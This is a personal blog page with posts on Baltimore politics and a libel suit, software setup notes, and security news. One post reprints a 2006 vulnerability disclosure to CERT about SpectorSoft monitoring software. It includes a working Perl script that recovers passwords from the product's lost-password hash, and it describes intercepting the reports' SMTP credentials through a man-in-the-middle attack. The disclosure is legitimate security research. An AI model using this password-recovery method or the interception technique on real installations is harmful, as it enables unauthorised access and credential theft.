Personal Website of Yakov ShafranovichShafTek.org = SHAFranovich TECHnologies |
As a followup on my interactions with the Baltimore City’s Environmental Control Board, the state’s Attorney General’s office recently posted an opinion as to some of their practices. It is available here.
As mentioned before, all of my ECB documents are here: http://goo.gl/kdGZe.
There is a small blog community here in Baltimore that covers politics and government: the anonymous quartet of Baltimore Slumlord Watch, Baltimore Crime, BaltiLeaks and Baltimore Government Watch (recently shut down); Adam Meister, Hassan Giordano and Sean Tully at the Examiner; Stephen Janis and his staff at the Investigative Voice; Baltimore Brew and Patch.com; and even several bloggers/twitterers at the local paper, the Baltimore Sun (Julie Scharper, Justin Fenton, etc.). Over time they have broken some big stories, got a hold of some smaller ones, and generally added a unique flavor to the otherwise stale Baltimore media.
Now comes word of a $21 million lawsuit by a Baltimore City Councilwoman Belinda Conaway against a blogger at the Examiner, Adam Meister because she “can’t sleep at night”. The blogger alleged that the councilwoman did not reside in the city as required by law and as proof showed state records where the councilwoman claimed a house outside the city as her primary residence. He also mentioned that her entire extended family including her father, her brother and her brother’s children and hers all live in one single family house in the city. This was followed up by a local TV station, the Citypaper and even the Baltimore Sun chipped down and analyzed some water bills. Overall, at no time did the councilwoman actually provide a real reason or defense as to why the state records show her primary residence outside the city. Only after the lawsuit was filed, did she try to give some sort of explanation.
She will be running to re-election next year, so perhaps this little story percolating in the background did not seem to bode well for her campaign. Plus it helps when your daddy is the clerk of Circuit Court, and is friends with all of the judges. So she went ahead and filed a $21 million lawsuit against the blogger for libel and defamation. An important point is that her lawyer, Thomas Maronick, is not exactly known to be defamation and libel expert; according to his own website he deals with criminal defense, medical malpractice, DUI, etc. but no where does it mention defamation or libel. He may have his own radio show but it does not appear that he is a defamation expert like this guy.
Now in the US, it is hard to prove libel and defamation, especially for a public figure. So this maybe just a harrasment suit, better known as SLAPP or “Strategic lawsuit against public participation”. As perWikipedia:
A strategic lawsuit against public participation (SLAPP) is a lawsuit that is intended to censor, intimidate and silence critics by burdening them with the cost of a legal defense until they abandon their criticism or opposition. The typical SLAPP plaintiff does not normally expect to win the lawsuit. The plaintiff’s goals are accomplished if the defendant succumbs to fear, intimidation, mounting legal costs or simple exhaustion and abandons the criticism. A SLAPP may also intimidate others from participating in the debate.
Additionally, Maryland has a special “anti-SLAPP” law specifically designed against lawsuits like this.
Now that the story went national with the AP carrying it, the best response maybe this comment from the Baltimore Sun story:
Councilwoman Conaway had two reasonable options:
#1 Ignore the whole matter and hope it goes away. The sun didn’t even bother to cover it until she filed suit.
#2 Admit the technical violation, pay the back tax, and move on with her life.
Instead she does this??
This information is quite old and I am not sure if it is still valid. However, the vendor never responded to what I sent them even with assistance of CERT. This was assigned VU#707817 in 2006.
- -------- Original Message --------
Subject: Re: Two vulnerabilities in SpectorSoft products VU#707817
Date: Mon, 20 Nov 2006 17:10:13 -0500
From: Yakov Shafranovich
To: CERT(R) Coordination Center
Background:
Spectorsoft Corp makes several products for monitoring computer and
Internet usage including eBlaster, Spector Pro, and others. Some of the
programs provide an option to email copies of the reports to the
subscriber via regular SMTP.
Also, the software provides ability for a user who forgot his password
to the software, to recover it by pressing a hidden key combination 6
times and obtain a special "hash" code. The hash code is sent to the
vendor and a password is returned. This process is posted publically on
the vendor's website:
http://www.spectorsoft.com/support/eblaster_windows/faq.html
Vulnerability #1:
The algorithm used to generate the lost password hashes is not secure,
and easily crackable, thus allowing anyone to easily access an installed
copy of the vendor's product even if a password is unknown. THIS
INFORMATION WAS OBTAINED BY SIMPLY ANALYZING A PASSWORD HASH FOR A KNOWN
PASSWORD. This could have been easily remedied by using a form of
public/private key encryption.
Second, the viewer executable which allows for login is easily found in
WINDOWS\SYSTEM32 directory - it is usually a 1.5 or 3 MB executible and
can be found there even on a system where the software is running in
stealth mode.
The algorithm for decoding the hash is as follows:
1. Given numeric hash of 7 numbers as follows:
288-1488-1776-336-624-912-5424
2. The first number is a magic value:
288
3. The last number is a checksum, equivelant to the sum of all numbers
in the hash. In this example:
288 + 1488 + 1776 + 336 + 624 + 912 = 5424
4. Taking the lowest number in the hash excluding the first and the
last, gives your the first character. Going from there and wrapping to
the front gives you the rest":
288-1488-1776-336-624-912-5424
4 5 6 1 2 3
5. Dividing each number except the first, by the magic value and adding
its place # gives you the ASCII value of the password:
#1 | 3 | 336 mod 288 = 48 | 48 + 1 = 49 | 1 |
#2 | 4 | 624 mod 288 = 48 | 48 + 2 = 50 | 2 |
#3 | 5 | 912 mod 288 = 48 | 48 + 3 = 51 | 3 |
#4 | 6 | 288 / 6 = 48 | 48 + 4 = 52 | 4 |
#5 | 1 | 1488 mod 288 = 48 | 48 + 5 = 53 | 5 |
#6 | 2 | 1776 mod 288 = 48 | 48 + 6 = 54 | 6 |
6. The first number's value is equal to the itself divided by the total
amount of numbers excluding the checksum:
288 / 6 = 48
7. The result is: '123456'
The perl code is as follows. A live copy of this script is available at:
[redacted]
=====================================================================
#!/usr/bin/perl
use lib qw(.);
use CGI;
use CGI::Carp qw(fatalsToBrowser);
#--- Check for parameters ---
if ($ENV{'REQUEST_METHOD'} eq "GET")
{ $in = $ENV{'QUERY_STRING'}; }
else
{ $in = <STDIN>; }
$q=new CGI($in);
if($q->param('hash') eq '')
{ print "Content-Type: text/plain\n\n";
print "500 ERROR: Missing parameter 'hash'.\n";
exit;
}
#--- prepare parameters ---
my $hash_raw = $q->param('hash');
my $dd = $q->param('dd');
my $count = ($hash_raw =~ tr/-//);
my @nums = split('-', $hash_raw);
my $magic = @nums[0];
my $sum = @nums[$count];
my $lowest = $count;
#--- check the checksum ---
my $check = 0;
for($i=0; $i < $count; $i++) {
$check = $check + @nums[$i];
}
if($check != $sum) {
print "Content-Type: text/plain\n\n";
print "Checksum DOES NOT match: is $check, must be $sum!\n";
exit;
}
print "Content-Type: text/html\n\n";
print "<html><head><title>Hash Calculator (c) 2006</title></head><body>";
print "<hr/><h1>Hash Calculator (c) 2006</h1><hr/>";
print "<table border='1'><tr><th>Name</th><th>Value</th></tr>";
print "<tr><td>Original Hash</td><td>$hash_raw</td></tr>";
print "<tr><td>Total Characters</td><td>$count</td></tr>";
if($dd eq 'y') {
print "<tr><td>Magic Value</td><td>$magic</td></tr>";
print "<tr><td>Checksum</td><td>$check = $sum (matches!)</td></tr>";
}
#--- find the lowest number ---
for($i=1; $i < $count; $i++) {
if(@nums[$i] < @nums[$lowest]) {
$lowest = $i;
}
}
if($dd eq 'y') {
print "<tr><td>Starting Slot</td><td>$lowest</td></tr>";
print "<tr><td>Starting slot value</td><td>@nums[$lowest]</td></tr>";
print "<tr><td colspan='2'>Calculation table below :</td></tr>";
print "<tr><td colspan='2'>";
}
#--- print the first part of the result ---
my $pass = '';
my $j = 1;
for($i = $lowest; $i < $count; $i++) {
my $raw = @nums[$i] - $magic*$j;
my $res = $raw + $j;
my $ch = chr($res);
$pass = $pass . $ch;
if($dd eq 'y') {
print "#$j | $i | @nums[$i] - ($magic*$j) = $raw | $raw + $j =
$res | $ch |<br/>";
}
$j++;
}
#--- process the magic part ---
my $raw = @nums[0] / $count;
my $res = $raw + $j;
my $ch = chr($res);
$pass = $pass . $ch;
if($dd eq 'y') {
print "<b>#$j | $i | @nums[0] / $count = $raw | $raw + $j = $res |
$ch |</b><br/>";
}
$j++;
#--- process the rest ---
for($i = 1; $i < $lowest; $i++) {
my $raw = @nums[$i] - $magic*$j;
my $res = $raw + $j;
my $ch = chr($res);
$pass = $pass . $ch;
if($dd eq 'y') {
print "#$j | $i | @nums[$i] - ($magic*$j) = $raw | $raw + $j =
$res | $ch |<br/>";
}
$j++;
}
if($dd eq 'y') {
print "</td></tr>";
}
print "<tr><td>Password</td><td><b>$pass</b></td></tr>";
print "</table><hr/></body></html>";
exit;
========================================================================
Vulnerability #2:
This is more of a design issue. When eBlaster is used to send reports
via SMTP the software is subject to a man in the middle act. By
monitoring network traffic one can see the email account and credentials
to which the reports are being sent, leading to a possibility of
exposing security credentials AND ability to fake the reports. The
reports are not digitally signed or encrypted.
Additionally, even when using TLS, it is possible in theory to run a man
in the middle attack by mapping the destination SMTP server's IP to
localhost via hosts.txt, and running a rougue SMTP server with TLS locally.
Just some short notes on running Mac OS X under Ubuntu 10:
1. Get a VMware image for Mac OS X, an ISO or make a copy of an existing Mac OS installation into VMWare or VirtualBox disk image.
2. Create a new VirtualBox 4 VM as follows:
3. Add the disk image to VB and start.
Screenshot below:
I had been recently kicking around some coding ideas but until now all of my hobby coding has been done in Perl. I wanted to try something browser-based which led me back to Java, so of course I installed Eclipse as my IDE. However, I ran into an issue when I tried to install Visual Editor, a plugin used for developing GUI applications. However, I was not able to install it. After some extensive Googling, and trial and error, I finally came up with a solution which I am sharing below.
First of all, about versioning: there are two current versions of Eclipse – 3.5 aka Ganymede and 3.6 aka Helios. Ubuntu 10.10 which I use on home box comes with the 3.5 version. Visual Editor also has two versions, 1.4 dating from 2009 and a more recent 1.5 release from late 2010. Because I wanted the 1.5 version with Eclipse 3.6, and after reading multiple posts describing issues with the Ubuntu packaged Eclipse, I installed the default packages and installed Eclipse 3.6 manually as follows:
To install Visual Editor 1.5:
A recent breach at a SSL Certificate Authority (Comodo) had nine fake SSL certificate issued as a result for sites like Gmail, Yahoo, etc. [details here at the EFF]. While desktop browsers issued updates, the overlooked issue here is mobile. Browsers on mobile devices are usually in firmware, and issuing firmware updates is not trivial. That means that currently most mobile devices are vulnerable to this fake SSL mess – something that no one has mentioned.
You can view it here: ecb-letter.
UPDATE: All of the ECB related documents I have collected are now available here: http://goo.gl/kdGZe.
(followup to part I)
I have been using Virgin Mobile USA’s Samsung Intercept for about 2 months now. Good things I have found:
Some bad things:
Overall I would have to say that it is a great deal for the price I am paying, however, it is not for someone who is looking for playing Android games, but for basic usage it seems to be fine.
Techcrunch posted a story earlier about an open letter from a company called VeriFone which is a traditional credit card processor. They apparently claim to have discovered a security vulnerability in a competitor’s product, Square. The vulnerability is that the competitor’s hardware credit card reader does not encrypt data between the reader and the host phone, allowing in theory for an easy and free skimmer. They even went as far releasing a free app that can do that.
Now the problem is that security vulnerabilities have a process that most security researchers follow – they tell the vendor first, or use an intermediate party like CERT as a go in between. The reason for that is that the vendor should be given an opportunity to fix the problem first. In this case this responsible disclosure policy was not followed.
The vulnerability itself is not very advanced – people can copy credit card numbers by hand if they have your card, and they type in numbers manually as well. HOWEVER, the issue is that of a competitor using this as leverage to drive people away . Considering that VeriFone is a public company, this may have legal repercussions as well.
This can be based compared to Microsoft going around and advertising Linux security holes, or Google doing the same to Apple. Note, that none of them have done this, ever. Why – because if companies start doing this, the entire disclosure process breaks down and everyone is worse off.
This is a followup on my earlier post regarding Baltimore’s Environmental Control Board otherwise known as “trash court”. Below are copies of the most recent contracts for the administrative law judges that hear the cases for the Board. These were obtained via the Maryland Public Information Act (PIA) from the city.
UPDATE #2: All of the ECB related documents I have collected are now available here: http://goo.gl/kdGZe
UPDATE: Adam Meister points out that one of the judges, Gary Brooks, is former mayor Sheila Dixon’s next door neighbour. BGW points out as I already knew that the other judge, Ms. Welch is married to the chief judge of the Circuit Court of Baltimore city, which hears appeals from the ECB.
You can download the entire file here, or read below: